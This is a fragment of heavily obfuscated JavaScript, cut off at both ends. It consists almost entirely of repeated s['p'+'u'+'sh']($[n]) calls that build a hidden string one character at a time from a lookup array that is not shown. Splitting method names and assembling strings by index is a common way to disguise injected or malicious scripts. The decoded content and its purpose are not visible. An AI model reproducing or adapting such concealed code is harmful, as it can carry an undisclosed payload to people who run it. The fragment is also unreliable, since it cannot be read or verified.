);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[70]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[12]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[71]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[71]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[71]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[71]\);s["p"+"u"+"sh"]\($[59]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[55]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[39]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[71]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[70]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[71]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[54]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[50]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[74]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[27]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[54]\);s["p"+"u"+"sh"]\($[0]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[8]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[12]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[27]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[54]\);s["p"+"u"+"sh"]\($[0]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[44]\);s["p"+